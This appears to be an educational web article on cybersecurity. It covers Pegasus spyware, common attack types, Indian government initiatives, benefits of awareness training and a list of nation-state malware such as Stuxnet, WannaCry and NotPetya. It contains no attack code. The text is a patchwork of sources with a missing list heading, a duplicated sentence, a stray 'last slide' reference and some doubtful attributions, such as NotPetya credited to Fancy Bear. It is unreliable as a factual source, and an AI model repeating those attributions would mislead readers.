It is a type of malicious software or malware classified as a spyware.
It is designed to gain access to devices, without the knowledge of users, and gather personal information and relay it back to whoever it is that is using the software to spy.
Pegasus has been developed by the Israeli firm NSO Group that was set up in 2010.
The earliest version of Pegasus discovered, which was captured by researchers in 2016, infected phones through what is called spear-phishing – text messages or emails that trick a target into clicking on a malicious link.
Since then, however, NSO’s attack capabilities have become more advanced. Pegasus infections can be achieved through so-called “zero-click” attacks, which do not require any interaction from the phone’s owner in order to succeed.
These will often exploit “zero-day” vulnerabilities, which are flaws or bugs in an operating system that the mobile phone’s manufacturer does not yet know about and so has not been able to fix.
What are the types of cyber attacks?
Malware: It is short for malicious software, refers to any kind of software that is designed to cause damage to a single computer, server, or computer network. Ransomware, Spy ware, Worms, viruses, and Trojans are all varieties of malware.
Phishing: It is the method of trying to gather personal information using deceptive e-mails and websites.
Denial of Service attacks: A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic, or sending it information that triggers a crash.
Man-in-the-middle (MitM) attacks: Also known as eavesdropping attacks, occur when attackers insert themselves into a two-party transaction. Once the attackers interrupt the traffic, they can filter and steal data.
SQL Injection: SQL stands for Structured Query Language, a programming language used to communicate with databases. Many of the servers that store critical data for websites and services use SQL to manage the data in their databases. A SQL injection attack specifically targets such kinds of servers, using malicious code to get the server to divulge information it normally wouldn’t.
Cross-Site Scripting (XSS): Similar to an SQL injection attack, this attack also involves injecting malicious code into a website, but in this case the website itself is not being attacked. Instead the malicious code the attacker has injected, only runs in the user’s browser when they visit the attacked website, and it goes after the visitor directly, not the website.
Social Engineering: It is an attack that relies on human interaction to trick users into breaking security procedures in order to gain sensitive information that is typically protected.
What are the initiatives taken by the government to tackle the issue of cyber attacks?
Cyber Surakshit Bharat Initiative: It was launched in 2018 with an aim to spread awareness about cybercrime and building capacity for safety measures for Chief Information Security Officers (CISOs) and frontline IT staff across all government departments.
National Cyber security Coordination Centre (NCCC): In 2017, the NCCC was developed to scan internet traffic and communication metadata (which are little snippets of information hidden inside each communication) coming into the country to detect real-time cyber threats.
Cyber Swachhta Kendra: In 2017, this platform was introduced for internet users to clean their computers and devices by wiping out viruses and malware.
Indian Cyber Crime Coordination Centre (I4C): I4C was recently inaugurated by the government.
National Cyber Crime Reporting Portal has also been launched pan India.
Computer Emergency Response Team – India (CERT-IN): It is the nodal agency which deals with cybersecurity threats like hacking and phishing.
Laws in India related to Cyber Security
Information Technology Act, 2000.
Personal Data Protection Bill, 2019.
International Telecommunication Union (ITU): It is a specialized agency within the United Nations which plays a leading role in the standardization and development of telecommunications and cyber security issues.
To begin with the most apparent, security awareness training aids in the prevention of breaches. It is impossible to estimate the exact number of breaches that security awareness training avoids. In an ideal world, we’d be able to conduct a randomised controlled experiment comparing individuals who got instruction to those who did not.
This might be a step too far for most organisations. However, this does not exclude us from demonstrating the ROI of security awareness software. It is feasible to compare the number of occurrences prior to and following awareness efforts. The measurements that arise can be utilised to calculate ROI. Data breaches may cost millions of dollars. Meanwhile, security awareness training is reasonably priced. It doesn’t take much to generate significant profits.
2. Establishing a security culture
A security culture has long been seen as the holy grail for chief information security officers (CISOs). Similarly, such a culture is widely regarded as infamously difficult to develop. Some are moving in the right path with the help of security awareness training.
Creating a security culture entails incorporating security ideals into the fabric of your organisation. Training that includes situational awareness (why someone could be at danger), as well as job and home-life advantages, is an effective approach to get people on board. Advanced training tools may assist in monitoring and developing a security culture, making people your first line of defence.
3. Strengthening technical defences
Technological defences are an effective tool for preventing intrusions. However, technological defences require human input. Firewalls must be enabled. Security alerts must be acknowledged. Software must be upgraded. Few firms nowadays would dare to operate without technical safeguards. Nonetheless, technology defences cannot reach their full effectiveness without security awareness training. Today’s attackers rarely bother attempting to target firms only through technical methods. Today’s attackers generally target individuals since they are viewed as a simple route into secure networks.
4. To instil trust in your consumers
Consumers are becoming more conscious of cyberthreats. They want to feel protected and secure as clients. A company that takes steps to strengthen cyber security will have a greater chance of gaining customer trust. And a trustworthy company is one that retains its consumers.
This isn’t a wild guess. According to a recent Arcserve poll, 70% of customers feel businesses are not doing enough to protect cyber security. Almost two out of every three consumers would avoid doing business with a company that had been the victim of a cyberattack in the previous year. Customers clearly care about security credentials. Customers regard you as more responsible when you implement security awareness training. That can only be a positive thing.
5. To ensure compliance
To be clear, introducing security awareness training for the sake of compliance is not sufficient. Those that implement training merely to meet regulatory requirements risk doing the bare minimum. Nonetheless, an increasing number of agencies are requiring that particular businesses undergo security awareness training.
“Firms of all sizes must establish a ‘security culture,’ starting with the board and working their way down to every employee. Cyber security is a shared responsibility, and we adopt a collaborative approach to combating this danger, collaborating with the government, other regulators, and stakeholders on a national and worldwide scale.”
Compliance can be a pleasant side effect of security awareness training. Those that use it improve their security and, in many cases, satisfy regulatory obligations.
6. Being a socially responsible business
Cyberattacks may spread quickly, as WannaCry and NotPetya proved in 2017. The more compromised networks there are, the more vulnerable other networks become. And the vulnerability of one network raises the total risk for others.
The lack of security awareness training in one organisation exposes other organisations to risk. It’s a little like leaving your front door unlocked with the keys to the next door inside.
Security awareness training is beneficial to more than just you. It benefits your customers, suppliers, and everyone else who is connected to your network.
7. To boost staff morale
It is generally established that happy individuals are more productive. So, it’s important to realise that security awareness training accomplishes more than merely keep employees safe at work. It also keeps them safe in their personal lives.
This specific benefit, for the most part, goes unnoticed. If security awareness training serves its purpose, it is more than just an employer perk. It’s also a perk for employees.
A list of the most dangerous, effective, and most well-known malware strains that have been developed by the cyber-security units of various countries’ intelligence and military branches.
Regin
Regin, widely regarded as the most powerful malware family ever produced by a nation-state actor, was created by the NSA and shared with some of its Five Eyes allies (primarily with the GCHQ). Its existence was made public in 2014, however the first samples date back to 2011, with some suspecting that the virus was produced as early as 2003. Regin has been used in the wild in incidents involving Belgian telecom Belgacom, the German authorities, and, most recently, Russian search firm Yandex.
On a technological level, security researchers consider Regin to be the most complex malware framework to date, with modules covering tens of features, the majority of which are designed to perform surveillance activities and remain unnoticed on infected systems.
Flame
Flame was found in 2012, but security experts did not use the term “malware” to characterise it. Flame was so sophisticated at the time that the phrase “attack toolkit” was used to characterise its structure, which resembled that of its larger brother, Regin. Flame, as previously stated, is a collection of modules that function on top of the Flame architecture and are installed based on the capabilities that operators want. It was identified in 2012 by the MAHER Center of the Iranian National CERT in attacks on government entities in the nation. The finding emerged two years after the Stuxnet virus assaults and was instantly connected to the Equation Group, a codename for the US National Security Agency. It was eventually detected in attacks on other Middle Eastern governments as well. Flame’s Wikipedia page currently has the greatest summary of all Flame-related findings.
Stuxnet
Stuxnet is the only malware on this list with its own documentary film. The malware was co-developed in the 2000s by a joint effort between the US NSA and Israel’s Unit 8200, the Israeli military’s cyber division. It was deployed in 2010 in Iran, as part of a joint effort between the two countries to sabotage Iran’s nuclear program.
Stuxnet, which is said to have used four different zero-days at the time it was unleashed, had been specifically coded to target industrial control systems. Its role was to modify the settings of centrifuges used for nuclear enrichment operations by raising and lowering rotor speeds, with the purpose of inducing vibrations and destroying the machines. The malware was successful, and is said to have infected over 200,000 computers, and eventually ended up destroying nearly 1,000 centrifuges at Iran’s Natanz nuclear facility.
Shamoon
The first non-US developed malware on this list is Shamoon, a malware strain developed by Iran’s state hackers. It was first deployed in 2012 on the network of Saudi Aramco, Saudi Arabia’s largest oil producer. The malware, a data wiper, destroyed over 30,000 computers in the 2012 attack. It was deployed in a second attack in 2016, against the same target. Most recently, it’s been deployed against Italian oil and gas contractor Saipem, allegedly destroying 10% of the company’s PC fleet.
Triton
A more recent addition to this list is Triton (also known as Trisis). This malware is believed to have been developed by a Russian research laboratory. It was deployed in 2017. It was specifically engineered to interact with Schneider Electric’s Triconex Safety Instrumented System (SIS) controllers. According to technical reports from FireEye, Dragos, and Symantec, Triton was designed to either shut down a production process or allow TriconSIS-controlled machinery to work in an unsafe state. The malware’s code leaked and was eventually published on GitHub.
Industroyer
The Industroyer malware, also known as Crashoverride, is a malware framework developed by Russian state hackers and deployed in December 2016, in the cyber-attacks against Ukraine’s power grid.
The attack was successful and cut the power to a part of Kyiv, Ukraine’s capital, for an hour. The malware is considered an evolution of previous strains like Havex and BlackEnergy, which had also been used in attacks against Ukraine’s power grid. However, unlike Havex and BlackEnergy, which were more like generic Windows malware deployed against systems managing industrial systems, Industroyer contained components specifically designed to interact with Siemens power grid equipment.
Duqu
Believed to be the creation of Israel’s infamous Unit 8200 military cyber-unit, Duqu was discovered by Hungarian security researchers in 2011. A second version was discovered in 2015, and was codenamed Duqu 2.0. The first version was deployed to aid Stuxnet attacks, while the second was used to compromise the network of Russian antivirus firm Kaspersky Lab. Duqu 2.0 was also found on computers in hotels in Austria and Switzerland where the international negotiations between the US/EU and Iran took place, over its nuclear program and economic sanctions.
PlugX
PlugX is a remote access trojan (RAT) that was first seen in 2012, in attacks attributed to Chinese nation-state hackers. Since its discovery, Chinese hackers appear to have shared the malware with each other, and now it’s being widely used by most Chinese nation-state groups, making attribution to one group incredibly difficult. A good technical report on PlugX is available here.
Winnti
Winnti is very similar to PlugX. It’s another Chinese-made APT malware strain that was initially used by one group but was then shared among all the Chinese APTs as time went by. The malware has been around since 2011 and is described as a modular backdoor trojan. Security researchers recently discovered a Linux variant.
Uroburos
Uroburos was the rootkit developed by the Turla group, one of the world’s most advanced nation-state hacker groups, linked to the Russian government. According to a G DATA report, “the rootkit is able to take control of an infected machine, execute arbitrary commands and hide system activities.”
Uroburos (also referred to as the Turla or Snake rootkit) was widely deployed and was very efficient for the limited purpose it was being used for — to gain boot persistence and download other malware strains. It was the central piece of Turla APT attacks and had been seen on infected computers in Europe, the US, and the Middle East, as early as 2008. Targets usually included government entities. It was seen in 45 countries. A Linux variant was also discovered in 2014.
ICEFOG
Yet another piece of Chinese malware that was once used by one group, but was later shared and re-used by others. ICEFOG, first spotted in 2013, made a comeback in the last two years, with new variants, and even a Mac version.
WARRIOR PRIDE
The only mobile malware on this list, WARRIOR PRIDE is a tool jointly developed by the US’ NSA and the UK’s GCHQ. It works both on Android and iPhones and news of its existence came to be in 2014, during the Snowden leaks. As for capabilities, the iPhone variant was far more advanced than the Android one. It could retrieve any content from infected hosts, listen to nearby conversations by silently enabling the microphone, and could work even when the phone was in sleep mode.
Olympic Destroyer
The Olympic Destroyer malware was deployed in an attack that crippled internet connections during the Pyeongchang 2018 Winter Olympics opening ceremony. TV stations and journalists were the ones mostly impacted by the attack. The malware was supposedly created by Russian hackers and deployed as payback for the International Olympic Committee banning Russian athletes from the Winter Olympics on doping charges or prohibiting someone from competing under the Russian flag.
The malware itself was an information stealer that dumped app passwords on infected systems, which hackers later used to escalate their access to other systems, from where they later triggered a data-wiping attack that brought down some servers and routers. New Olympic Destroyer versions were spotted in June 2018, months after the initial attacks.
VPNFilter
The only APT-developed malware on this list created to infect routers is VPNFilter. Developed by Russian state-hackers, the malware had been deployed in advance of the 2018 Champions League final that was being held in Kyiv, Ukraine. Supposed plans were to deploy the malware and damage routers during the live final’s live transmissions, similar to how the Olympic Destroyer malware was used to cripple internet connections during the opening ceremony at the Pyeongchang 2018 Winter Olympics.
Fortunately, security researchers from Cisco Talos saw the VPNFilter botnet being assembled, and took it down with the help of the FBI. The malware was supposedly created by the Fancy Bear APT, according to the FBI.
WannaCry
All the three ransomware outbreaks of 2017 were malware strains developed by nation-state hackers, albeit for different reasons.
The first of these, the WannaCry ransomware, was developed by North Korean state hackers, for the sole purpose of infecting victims and collecting ransoms for the Pyongyang regime, which at the time, was under heavy economic sanctions. To lighten the impact of these sanctions, the regime was using state hackers to rob banks, mine cryptocurrency, or run ransomware operations to collect funds. However, errors in the WannaCry code made it so that instead of spreading to local networks only, the ransomware’s internal self-replicating (worm) component went haywire and infected everything in sight, causing a global outbreak.
NotPetya
Two months after WannaCry, a second ransomware outbreak hit the world. Called NotPetya, this ransomware was coded by Russia’s Fancy Bear (APT28) group, and was initially deployed only in Ukraine. However, due to shared networks and enterprise VPNs, the ransomware spread globally, akin to WannaCry, causing billions in damages. Just like WannaCry, NotPetya used the EternalBlue exploit as the centerpiece of its worm component. (see the last slide for more info on EternalBlue)
Bad Rabbit
The last global ransomware outbreak of 2017, was the work of state hackers. Just like NotPetya, Bad Rabbit was the work of Russian hackers, who similarly deployed it in Ukraine, but the ransomware spread worldwide, albeit with a smaller impact when compared to the first two, WannaCry and NotPetya. Unlike NotPetya, it didn’t use EternalBlue as its primary spreading mechanism, and also included lots of Game of Thrones references.
EternalBlue
EternalBlue may not be malware per-se, in the classical meaning of the word, being more of an exploit, but it was still developed by a nation-state entity and should fit on this list. It was created by the NSA and became public in April 2017, when a group of mysterious hackers known as The Shadow Brokers published the code online.
After its release, it was first used in cryptocurrency mining campaigns, but it truly became a widely-known and recognizable term after it was embedded in the code of the three ransomware outbreaks of 2017, namely WannaCry, NetPetya, and Bad Rabbit. Since then, EternalBlue has refused to die and has been widely used by all sorts of cyber-criminal operations, all of whom use it as a mechanism for spreading to other systems inside compromised networks, by exploiting misconfigured SMBv1 clients on Windows computers.
Protecting networks, data, programs, and other information from illegal access, change, or destruction is the most basic definition of cyber security. Because of recent cyber-attacks and cyber-attacks, cyber security is becoming very important all over the world. Software for data protection is developed by many companies. Many businesses create software for data protection. The data is secured by this program. Cybersecurity is critical since it not only protects data but also protects our systems from viruses. India has the most internet users, followed by the United States and China.
What is the significance of cyber security in today’s society?
You require cybersecurity in the same way that the world requires an ozone layer to protect it from harmful ultraviolet radiation from the sun. And, just as holes in the ozone layer have an impact on our civilization’s destiny, so do vulnerabilities in your company’s cybersecurity. Hackers have gotten more active on the internet during the previous few years. They use advanced techniques to infect unsuspecting individuals and businesses with malware, ransomware, and other destructive attacks. Most of the time, you won’t know if you’ve been hacked or not. Cybersecurity risks are more widespread than you may believe, with one attack occurring every twenty seconds around the globe, according to statistics.
Cybersecurity risks are more widespread than you may believe, with one attack occurring every twenty seconds around the globe, according to statistics. Fundamentally, our society is more technologically dependent than it has ever been, and there is no indication that this tendency will reverse. Data breaches that potentially lead to identity theft are now being made public on social media accounts. Social security numbers, credit card numbers, and bank account data are now kept in cloud storage services such as Dropbox or Google Drive.
Cyber Security Threats and Attacks:
Malware: The most common sort of cyberattack is a malware attack. Malware is harmful software, such as spyware, ransomware, viruses, and worms, that is placed on a computer when a user clicks on a malicious link or email. Malware can block access to essential network components, harm the system, and collect confidential information, among other things, once it has gained access to the system.
Phishing is a type of fraud in which false emails posing as emails from trusted sources are sent with the purpose of stealing sensitive data such as credit cards or login information.
Ransomware assaults are a sort of malware in which an attacker encrypts and locks the victim’s computer system files, then demands payment to unlock and decode them. According to Mimecast’s The State of Email Security Report 2020, 51 percent of organizations have been affected by ransomware in the last 12 months.
Distributed denial-of-service (DDoS) attacks: A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt regular traffic on a targeted server, service, or network by flooding the target or its surrounding infrastructure with Internet traffic.
Social engineering assaults can be carried out in a number of ways. To carry out the assault, a perpetrator first examines the intended victim to obtain background information such as possible avenues of entry and weak security mechanisms. The attacker then works to acquire the victim’s trust and give stimuli for further acts that violate security protocols, such as exposing sensitive data or granting access to crucial resources.
Eduindex News 
You must be logged in to post a comment.